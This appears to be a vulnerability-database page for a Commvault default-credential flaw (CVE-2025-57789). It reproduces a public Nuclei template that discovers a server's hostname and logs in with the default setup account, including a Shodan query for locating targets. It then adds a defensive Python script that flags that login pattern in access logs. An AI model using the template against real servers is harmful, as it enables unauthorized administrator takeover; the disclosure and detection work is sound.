CVE-2025-57789: Commvault Initial Administrator Login Process Vulnerability

Date: 2025-08-01 | Affected software: Commvault | PoC: public

Vulnerability description

An issue was discovered in Commvault before 11.36.60. During the brief window between installation and the first administrator login, remote attackers may exploit the default credential to gain admin control. This is limited to the setup phase, before any jobs have been configured.

PoC code [public]

id: CVE-2025-57789

info:
  name: Commvault Initial Administrator Login Process Vulnerability
  author: DhiyaneshDK,watchtowr
  severity: medium
  description: |
    An issue was discovered in Commvault before 11.36.60.During the brief window between installation and the first administrator login, remote attackers may exploit the default credential to gain admin control. This is limited to the setup phase, before any jobs have been configured.
  reference:
    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/
    - https://documentation.commvault.com/securityadvisories/CV_2025_08_4.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-57789
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.favicon.hash:-542502280
  tags: cve,cve2025,commandcenter,commvault,unauth

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/commandcenter/publicLink.do"

    extractors:
      - type: regex
        name: connection
        group: 1
        part: body
        regex:
          - '"activeMQConnectionURL":"tcp:\/\/(.*?):\d+.*"'
        internal: true

  - raw:
      - |
        POST /commandcenter/api/Login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json;charset=UTF-8

        {
          "username": "{{connection}}_localadmin__",
          "password": "YSAtbG9jYWxhZG1pbg==",
          "commserver": "{{connection}} -cs {{connection}}"
        }

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "userGUID","token")'
        condition: and
# digest: 490a0046304402205142ef9c344ac365cb8cde06a6bf787ca98f8bda8b52c161c45dfedeb1252d380220771d8a75fd2fad22b8aaa1c56dae2ebda4d7ced10e26b7da551b9c7db73e8d3d:922c64590222798bb761d5b6d8e72950
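A defender-side detection example, added here and not part of the original page or of Commvault's tooling: it scans web-access log lines for the two-request pattern the template above sends (a GET to publicLink.do to learn the hostname, then a POST to /commandcenter/api/Login with a username ending in `_localadmin__`). The log format and the sample lines are constructed assumptions.

```python
import json
import re

# Constructed sample access log (not from the page or any real deployment).
# Assumed format: "<timestamp> <client_ip> <method> <path> <json_body_or_->"
SAMPLE_LOG = """\
2025-08-01T10:00:01Z 203.0.113.7 GET /commandcenter/publicLink.do -
2025-08-01T10:00:02Z 203.0.113.7 POST /commandcenter/api/Login {"username":"cvhost_localadmin__","password":"<redacted>","commserver":"cvhost -cs cvhost"}
2025-08-01T10:05:00Z 192.0.2.10 POST /commandcenter/api/Login {"username":"alice","password":"<redacted>","commserver":"cvhost"}
2025-08-01T10:06:00Z 192.0.2.11 GET /commandcenter/publicLink.do -
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (.*)$")
# Username suffix the template uses for the setup-phase default account.
DEFAULT_ACCOUNT_SUFFIX = "_localadmin__"


def find_default_account_logins(log_text):
    """Return one finding per Login POST whose username ends with the default
    account suffix. Each finding records whether the same client fetched
    publicLink.do earlier, which is the template's hostname-discovery step."""
    clients_seen_publiclink = set()
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        ts, ip, method, path, body = m.groups()
        if method == "GET" and path.endswith("/commandcenter/publicLink.do"):
            clients_seen_publiclink.add(ip)
            continue
        if method == "POST" and path.endswith("/commandcenter/api/Login"):
            try:
                username = json.loads(body).get("username", "")
            except ValueError:
                continue  # body is not JSON; nothing to inspect
            if username.endswith(DEFAULT_ACCOUNT_SUFFIX):
                findings.append({
                    "ts": ts,
                    "ip": ip,
                    "username": username,
                    "recon_seen": ip in clients_seen_publiclink,
                })
    return findings


if __name__ == "__main__":
    for f in find_default_account_logins(SAMPLE_LOG):
        print(f)
```

A hit with `recon_seen` set is the exact sequence the template drives; a hit without it still warrants review because the default account should never be used once initial setup is complete.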
